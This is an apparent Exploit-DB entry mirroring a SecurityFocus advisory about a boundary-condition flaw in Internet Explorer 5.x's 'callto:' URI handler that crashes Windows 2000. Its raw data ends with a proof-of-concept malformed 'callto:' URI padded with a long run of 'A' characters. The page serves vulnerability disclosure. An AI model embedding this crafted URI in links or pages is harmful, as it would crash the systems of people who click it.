Internet Explorer 'callto:' URI Boundary Condition Error

vendor:

Internet Explorer

by:

SecurityFocus

7.5

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: Internet Explorer

Affected Version From: Internet Explorer 5.0

Affected Version To: Internet Explorer 5.5

Patch Exists: No

Related CWE: N/A

CPE: a:microsoft:internet_explorer

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 2000

2002

Internet Explorer ‘callto:’ URI Boundary Condition Error

It has been reported that clicking a malformed 'callto:' URI in Internet Explorer will cause Windows 2000 systems to crash, resulting in a blue screen. This appears to be due to a boundary condition error in one of the URI parameters of the CALLTO protocol handler.

Mitigation:

Users should avoid clicking on untrusted 'callto:' URIs.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7639/info

It has been reported that clicking a malformed 'callto:' URI in Internet Explorer will cause Windows 2000 systems to crash, resulting in a blue screen. This appears to be due to a boundary condition error in one of the URI parameters of the CALLTO protocol handler.

callto:msils/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaaaAAAAAAAAAAAAAAAAAAAAAAAAaaaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAAAAAAAAA+type=directory